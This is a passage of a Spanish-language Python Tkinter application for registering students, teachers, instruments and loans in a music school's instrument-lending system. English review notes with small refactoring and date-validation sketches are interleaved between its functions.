entry_tel_estudiante.grid(row=7, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_mail_estudiante = ttk.Label(ventana_registro, text=\"E-Mail\", font=(\"Arial\", 10, \"bold\"))\r\n label_mail_estudiante.grid(row=6, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_mail_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_mail_estudiante.grid(row=7, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_Carrera_estudiante = ttk.Label(ventana_registro, text=\"Carrera\", font=(\"Arial\", 10, \"bold\"))\r\n label_Carrera_estudiante.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_carrera_estudiante = 
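Each registration window below builds the same bold label over a 30-character entry by hand, eight or more times. A small factory in the same grid conventions would shrink these functions considerably; the helper name and its padding rule are introduced here as a sketch, not taken from the original.

def agregar_campo(ventana, texto, fila, columna):
    # One labelled entry in the label-above-entry layout used by the
    # registration windows; returns the entry so the caller can read it later.
    padx = (15, 0) if columna == 0 else (80, 0)
    etiqueta = ttk.Label(ventana, text=texto, font=("Arial", 10, "bold"))
    etiqueta.grid(row=fila, column=columna, padx=padx, pady=(20, 0))
    entrada = ttk.Entry(ventana, width=30)
    entrada.grid(row=fila + 1, column=columna, padx=padx, pady=(0, 10))
    return entrada

# e.g. entry_rut_estudiante = agregar_campo(ventana_registro, "RUT", 2, 0)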
ttk.Entry(ventana_registro, width=30)\r\n entry_carrera_estudiante.grid(row=9, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_CAR_estudiante = ttk.Label(ventana_registro, text=\"Certificado Alumno Regular\", font=(\"Arial\", 10, \"bold\"))\r\n label_CAR_estudiante.grid(row=8, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_CAR_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_CAR_estudiante.grid(row=9, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_estudiante = ttk.Button(ventana_registro, text=\"Registrar Estudiante\", command=en_desarrollo, width=30)\r\n btn_registro_estudiante.grid(row=10, column=1, padx=(80,0), pady=(25,10))\r\n \r\n \r\n\r\ndef ventana_registro_profesor():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. Por ahora se usa GLOBAL\r\n global entry_rut_profesor, entry_nombre_profesor, entry_app1_profesor, entry_app2_profesor\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Profesor\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Profesor\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_rut_profesor = ttk.Label(ventana_registro, text=\"RUT\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_profesor.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_profesor.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_nombre_profesor = ttk.Label(ventana_registro, text=\"Nombre\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_profesor.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_nombre_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_profesor.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_app1_profesor = ttk.Label(ventana_registro, text=\"Apelido Paterno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app1_profesor.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_app1_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_app1_profesor.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_app2_profesor = ttk.Label(ventana_registro, text=\"Apelido Materno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app2_profesor.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_app2_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_app2_profesor.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_profesor = ttk.Button(ventana_registro, text=\"Registrar Profesor\", command=en_desarrollo, width=30)\r\n btn_registro_profesor.grid(row=10, column=1, padx=(80,0), pady=(180,10))\r\n \r\n \r\n\r\n \r\ndef ventana_registro_instrumento():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Instrumento\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # 
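On the code's own question above about avoiding `global`: the save button can capture its entry widgets in the callback instead of publishing them as module globals. A sketch with functools.partial; registrar_profesor_desde is a hypothetical stand-in for the real save logic.

from functools import partial

def registrar_profesor_desde(entries):
    # entries is the dict of ttk.Entry widgets captured at window-build time.
    datos = {campo: entrada.get() for campo, entrada in entries.items()}
    print(datos)  # stand-in for the eventual INSERT

def ventana_registro_profesor_sin_globals():
    ventana = tk.Toplevel(root)
    entries = {campo: ttk.Entry(ventana, width=30)
               for campo in ("rut", "nombre", "apellido1", "apellido2")}
    for fila, entrada in enumerate(entries.values()):
        entrada.grid(row=fila, column=0, padx=15, pady=5)
    boton = ttk.Button(ventana, text="Registrar Profesor",
                       command=partial(registrar_profesor_desde, entries))
    boton.grid(row=len(entries), column=0, pady=10)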
Titulo dentro de ventana\r\n label_titulo_registra_instrumento = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Instrumento\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_instrumento.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_num_serie_instrumento = ttk.Label(ventana_registro, text=\"Numero de Serie\", font=(\"Arial\", 10, \"bold\"))\r\n label_num_serie_instrumento.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_num_serie_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_num_serie_instrumento.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_num_inv_instrumento = ttk.Label(ventana_registro, text=\"Numero de Inventario\", font=(\"Arial\", 10, \"bold\"))\r\n label_num_inv_instrumento.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_num_inv_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_num_inv_instrumento.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_nombre_instrumento = ttk.Label(ventana_registro, text=\"Nombre\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_instrumento.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_nombre_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_instrumento.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_marca_instrumento = ttk.Label(ventana_registro, text=\"Marca\", font=(\"Arial\", 10, \"bold\"))\r\n label_marca_instrumento.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_marca_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_marca_instrumento.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_medidas_instrumento = ttk.Label(ventana_registro, text=\"Medidas\", font=(\"Arial\", 10, \"bold\"))\r\n label_medidas_instrumento.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_medidas_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_medidas_instrumento.grid(row=7, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_avaluo_instrumento = ttk.Label(ventana_registro, text=\"Avaluo\", font=(\"Arial\", 10, \"bold\"))\r\n label_avaluo_instrumento.grid(row=6, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_avaluo_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_avaluo_instrumento.grid(row=7, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_estado_instrumento = ttk.Label(ventana_registro, text=\"Estado\", font=(\"Arial\", 10, \"bold\"))\r\n label_estado_instrumento.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_estado_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_estado_instrumento.grid(row=9, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_instrumento = ttk.Button(ventana_registro, text=\"Registrar Instrumento\", command=en_desarrollo, width=30)\r\n btn_registro_instrumento.grid(row=10, column=1, padx=(80,0), pady=(25,10))\r\n \r\n\r\n\r\ndef ventana_registro_eventual():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Eventual\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n global entry_rut_prestamo_eventual, entry_rut2_prestamo_eventual, entry_numserie_eventual, 
entry_fecha_solicitud_eventual\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_eventual = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Prestamo Eventual\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_eventual.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_rut_prestamo_eventual = ttk.Label(ventana_registro, text=\"Rut Estudiante\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_prestamo_eventual.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_prestamo_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_prestamo_eventual.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_rut2_prestamo_eventual = ttk.Label(ventana_registro, text=\"Rut Encargado\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut2_prestamo_eventual.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_rut2_prestamo_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_rut2_prestamo_eventual.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_numserie_eventual = ttk.Label(ventana_registro, text=\"Numero Serie de Instrumento\", font=(\"Arial\", 10, \"bold\"))\r\n label_numserie_eventual.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_numserie_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_numserie_eventual.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_fechainicio_eventual = ttk.Label(ventana_registro, text=\"Fecha Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechainicio_eventual.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_fecha_solicitud_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_fecha_solicitud_eventual.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n label_info = ttk.Label(ventana_registro, text=\"Formato Fechas: YYYY-MM-DD\", font=(\"Arial\", 8, \"bold\"))\r\n label_info.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_eventual = ttk.Button(ventana_registro, text=\"Registrar Prestamo\", command=registrar_prestamo_eventual, width=30)\r\n btn_registro_eventual.grid(row=10, column=1, padx=(80,0), pady=(75,10))\r\n \r\n\r\n\r\n\r\ndef ventana_registro_anual():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Prestamo Anual\")\r\n ventana_registro.geometry(\"500x515\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_estudiante = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Anual\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_estudiante.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_codigo_anual = ttk.Label(ventana_registro, text=\"Codigo Contrato\", font=(\"Arial\", 10, \"bold\"))\r\n label_codigo_anual.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_codigo_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_codigo_anual.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_calle_anual = ttk.Label(ventana_registro, text=\"Calle\", font=(\"Arial\", 10, \"bold\"))\r\n label_calle_anual.grid(row=2, column=1, padx=(80,0), 
pady=(20,0))\r\n \r\n entry_calle_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_calle_anual.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_numcalle_anual = ttk.Label(ventana_registro, text=\"Numero Calle\", font=(\"Arial\", 10, \"bold\"))\r\n label_numcalle_anual.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_numcalle_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_numcalle_anual.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_comuna_anual = ttk.Label(ventana_registro, text=\"Comuna\", font=(\"Arial\", 10, \"bold\"))\r\n label_comuna_anual.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_comuna_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_comuna_anual.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_tel_anual = ttk.Label(ventana_registro, text=\"Telefono\", font=(\"Arial\", 10, \"bold\"))\r\n label_tel_anual.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_tel_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_tel_anual.grid(row=7, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_nombre_director_anual = ttk.Label(ventana_registro, text=\"Nombre Director\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_director_anual.grid(row=6, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_nombre_director_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_director_anual.grid(row=7, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_rut_director_anual = ttk.Label(ventana_registro, text=\"Rut Director\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_director_anual.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_director_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_director_anual.grid(row=9, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_fechainicio_anual = ttk.Label(ventana_registro, text=\"Fecha Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechainicio_anual.grid(row=8, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_fechainicio_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_fechainicio_anual.grid(row=9, column=1, padx=(80,0), pady=(0,10))\r\n \r\n label_fechatermino_anual = ttk.Label(ventana_registro, text=\"Fecha Termino\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechatermino_anual.grid(row=10, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_fechatermino_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_fechatermino_anual.grid(row=11, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_fechacontrato_anual = ttk.Label(ventana_registro, text=\"Fecha Contrato\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechacontrato_anual.grid(row=10, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_fechacontrato_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_fechacontrato_anual.grid(row=11, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n btn_registro_anual = ttk.Button(ventana_registro, text=\"Registrar Prestamo\", command=en_desarrollo, width=27)\r\n btn_registro_anual.grid(row=14, column=1, padx=(83, 0), pady=(10, 10))\r\n \r\n \r\n\r\n\r\n# ### 1er Registro - Registrar Prestamo Eventual\r\n# Btn para Registro 1\r\n\r\n#style = ttk.Style()\r\n#style.configure(\"no_disponible\", background=\"#00ff00\")\r\n#, style=\"no_disponible\"\r\n\r\nbtn_registro1 = ttk.Button(tab3, text=\"Registrar Prestamo Eventual\", command=ventana_registro_eventual, width=50)\r\nbtn_registro1.grid(row=2, column=0, padx=10, 
pady=(30,10))\r\n\r\n\r\n\r\n\r\n# ### 2er Registro - Registrar Prestamo Anual\r\n# Btn para Registro 2\r\nbtn_registro2 = ttk.Button(tab3, text=\"Registrar Prestamo Anual\", command=ventana_registro_anual, width=50)\r\nbtn_registro2.grid(row=4, column=0, padx=10, pady=10)\r\n\r\n\r\n\r\n# ### 3er Registro - Registrar Estudiante\r\n# Btn para Registro 3\r\nbtn_registro3 = ttk.Button(tab3, text=\"Registrar Estudiante\", command=ventana_registro_estudiante, width=40)\r\nbtn_registro3.grid(row=6, column=0, padx=10, pady=(40,10))\r\n\r\n\r\n\r\n# ### 4er Registro - Registrar Instrumento\r\n# Btn para Registro 4\r\nbtn_registro4 = ttk.Button(tab3, text=\"Registrar Instrumento\", command=ventana_registro_instrumento, width=40)\r\nbtn_registro4.grid(row=8, column=0, padx=10, pady=10)\r\n\r\n\r\n\r\n# ### 5er Registro - Registrar Profesor\r\n# Btn para Registro 5\r\nbtn_registro5 = ttk.Button(tab3, text=\"Registrar Profesor\", command=ventana_registro_profesor, width=40)\r\nbtn_registro5.grid(row=10, column=0, padx=10, pady=10)\r\n\r\n# Centra los elementos de la Tab3 - Registra\r\ntab3.columnconfigure(0, weight=1)\r\ntab3.columnconfigure(0, weight=1)\r\n\r\n\r\n\r\n\r\n# Elementos de U.I. De Consultas de Proyecto | TAB 4 ---->\r\n\r\n### Elementos de ventanas que abren las consultas de TAB.4\r\n\r\ndef ventana_consulta_proyecto_3():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. Por ahora se usa GLOBAL\r\n global ven3_entry_inicio, ven3_entry_termino\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Consulta de proyecto\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Catedras con Instrumentos Prestados\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels, TextEntries y combobox para cada campo.\r\n ven3_label_inicio = ttk.Label(ventana_registro, text=\"Fecha de Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n ven3_label_inicio.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven3_entry_inicio = ttk.Entry(ventana_registro, width=30)\r\n ven3_entry_inicio.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n ven3_label_termino = ttk.Label(ventana_registro, text=\"Fecha de Termino\", font=(\"Arial\", 10, \"bold\"))\r\n ven3_label_termino.grid(row=2, column=1, padx=(45,0), pady=(20,0))\r\n \r\n ven3_entry_termino = ttk.Entry(ventana_registro, width=30)\r\n ven3_entry_termino.grid(row=3, column=1, padx=(45,0), pady=(0,10))\r\n \r\n # Instrucciones para usuario sobre FECHA\r\n ven3_label_instrucciones = ttk.Label(ventana_registro, text=\"Formato de fecha: AAAA-MM-DD\", font=(\"Arial\", 10, \"bold\"))\r\n ven3_label_instrucciones.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n # Boton para ejecutar consulta.\r\n ven3_btn_consultar = ttk.Button(ventana_registro, text=\"Hacer Consulta\", command=execute_query_proyecto_3, width=30)\r\n ven3_btn_consultar.grid(row=10, column=1, padx=(65,0), pady=(180,10))\r\n\r\ndef ventana_consulta_proyecto_5():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. 
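The date fields in these consulta windows are free-text entries, so a malformed date only surfaces later as a database error. A pre-flight check against the AAAA-MM-DD format the labels promise, sketched with datetime.strptime (the function name is new):

from datetime import datetime

def fecha_valida(texto):
    # True when texto matches the YYYY-MM-DD format shown in the labels.
    try:
        datetime.strptime(texto, "%Y-%m-%d")
        return True
    except ValueError:
        return False

# Inside execute_query_proyecto_3, before building the query:
# if not (fecha_valida(ven3_inicio) and fecha_valida(ven3_termino)):
#     messagebox.showerror("Error", "Ejemplo de formato fecha: 2023-10-18")
#     return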
Por ahora se usa GLOBAL\r\n global ven5_entry_inicio, ven5_entry_termino, ven5_combo_tipo_instrumento\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Consulta de proyecto\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Prestamos de Instrumentos en Periodo\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels, TextEntries y combobox para cada campo.\r\n ven5_label_inicio = ttk.Label(ventana_registro, text=\"Fecha de Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_inicio.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven5_entry_inicio = ttk.Entry(ventana_registro, width=30)\r\n ven5_entry_inicio.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n ven5_label_termino = ttk.Label(ventana_registro, text=\"Fecha de Termino\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_termino.grid(row=2, column=1, padx=(45,0), pady=(20,0))\r\n \r\n ven5_entry_termino = ttk.Entry(ventana_registro, width=30)\r\n ven5_entry_termino.grid(row=3, column=1, padx=(45,0), pady=(0,10))\r\n \r\n \r\n \r\n ven5_label_tipo = ttk.Label(ventana_registro, text=\"Tipo de Instrumento\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_tipo.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven5_combo_valores = [\"Baritono\", \"Clarinete\", \"Corno\", \"Trombon\", \"Trompeta\", \"Tuba\", \"Viola\", \"Violin\", \"Violoncello\"]\r\n ven5_combo_tipo_instrumento = ttk.Combobox(ventana_registro, values=ven5_combo_valores, width=30)\r\n ven5_combo_tipo_instrumento.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n # Instrucciones para usuario sobre FECHA\r\n ven5_label_instrucciones = ttk.Label(ventana_registro, text=\"Formato de fecha: AAAA-MM-DD\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_instrucciones.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n # Boton para ejecutar consulta.\r\n ven5_btn_consultar = ttk.Button(ventana_registro, text=\"Hacer Consulta\", command=execute_query_proyecto_5, width=30)\r\n ven5_btn_consultar.grid(row=10, column=1, padx=(45,0), pady=(130,10))\r\n\r\n\r\ndef ventana_consulta_proyecto_6():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. 
Por ahora se usa GLOBAL\r\n global ven6_entry_inicio, ven6_entry_termino, ven6_combo_tipo_prestamo, ven6_combo_catedra\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Consulta de proyecto\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Avaluo Total en Periodo\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels, TextEntries, y combobox para cada campo.\r\n \r\n ven6_label_inicio = ttk.Label(ventana_registro, text=\"Fecha de Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_inicio.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven6_entry_inicio = ttk.Entry(ventana_registro, width=30)\r\n ven6_entry_inicio.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n ven6_label_termino = ttk.Label(ventana_registro, text=\"Fecha de Termino\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_termino.grid(row=2, column=1, padx=(45,0), pady=(20,0))\r\n \r\n ven6_entry_termino = ttk.Entry(ventana_registro, width=30)\r\n ven6_entry_termino.grid(row=3, column=1, padx=(45,0), pady=(0,10))\r\n \r\n \r\n \r\n ven6_label_tipo = ttk.Label(ventana_registro, text=\"Tipo de Prestamo\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_tipo.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven6_combo_valores = [\"Eventual\", \"Anual\", \"Ambos\"]\r\n ven6_combo_tipo_prestamo = ttk.Combobox(ventana_registro, values=ven6_combo_valores, width=30)\r\n ven6_combo_tipo_prestamo.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n \r\n #ven6_label_catedra = ttk.Label(ventana_registro, text=\"Catedra\", font=(\"Arial\", 10, \"bold\"))\r\n #ven6_label_catedra.grid(row=4, column=1, padx=(45,0), pady=(20,0))\r\n\r\n #ven6_combo2_valores = [\"Baritono\", \"Cornos\", \"Trombon\", \"Trompeta\", \"Tuba\", \"Violin\", \"Violoncellos\"]\r\n #ven6_combo_catedra = ttk.Combobox(ventana_registro, values=ven6_combo2_valores, width=30)\r\n #ven6_combo_catedra.grid(row=5, column=1, padx=(15,0), pady=(0,10))\r\n \r\n # Instrucciones para usuario sobre FECHA\r\n ven6_label_instrucciones = ttk.Label(ventana_registro, text=\"Formato de fecha: AAAA-MM-DD\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_instrucciones.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n \r\n # Boton para ejecutar consulta.\r\n ven6_btn_consultar = ttk.Button(ventana_registro, text=\"Hacer Consulta\", command=execute_query_proyecto_6, width=30)\r\n ven6_btn_consultar.grid(row=8, column=1, padx=(45,0), pady=(130,10))\r\n\r\n\r\n### Elementos de TAB.4 principal\r\n\r\n\r\n\r\n# Contulta proyecto 1\r\ntab4_btn1 = ttk.Button(tab4, text=\"Instrumentos con Mayor Avaluo\", command=execute_query_proyecto_1, width=50)\r\ntab4_btn1.grid(row=1, column=1, padx=100, pady=(30, 10))\r\n\r\n# Contulta proyecto 2\r\ntab4_btn2 = ttk.Button(tab4, text=\"Instrumentos Disponibles\", command=execute_query_proyecto_2, width=50)\r\ntab4_btn2.grid(row=2, column=1, padx=100, pady=(0, 30))\r\n\r\n# Contulta proyecto 3\r\ntab4_btn3 = ttk.Button(tab4, text=\"Catedras con Instrumentos Prestados en Periodo\", command=ventana_consulta_proyecto_3, width=50)\r\ntab4_btn3.grid(row=3, column=1, padx=100, pady=(0, 10))\r\n\r\n# Contulta proyecto 
4\r\ntab4_btn4 = ttk.Button(tab4, text=\"Detalles Estudiantes con Prestamo Eventual\", command=execute_query_proyecto_4, width=50)\r\ntab4_btn4.grid(row=4, column=1, padx=100, pady=(0, 30))\r\n\r\n# Contulta proyecto 5\r\ntab4_btn5 = ttk.Button(tab4, text=\"Prestamos Anuales de Instrumento en Periodo\", command=ventana_consulta_proyecto_5, width=50)\r\ntab4_btn5.grid(row=5, column=1, padx=100, pady=(0, 10))\r\n\r\n# Contulta proyecto 6\r\ntab4_btn6 = ttk.Button(tab4, text=\"Avaluo Total Prestamos en Periodo\", command=ventana_consulta_proyecto_6, width=50)\r\ntab4_btn6.grid(row=6, column=1, padx=100, pady=(0, 15))\r\n\r\n\r\n\r\n\r\n\r\n# Elementos de U.I. De Graficos | TAB 5 ---->\r\n\r\n# ### Funciones de Graficos para TAB5\r\n\r\ndef grafico_stock(data):\r\n print(\"grafico_stock llamado\")\r\n \r\n plt.figure(figsize=(8, 5))\r\n \r\n # Saca los tipos y cantidades de instrumentos de la tabla\r\n types = [row[0] for row in data]\r\n counts = [row[1] for 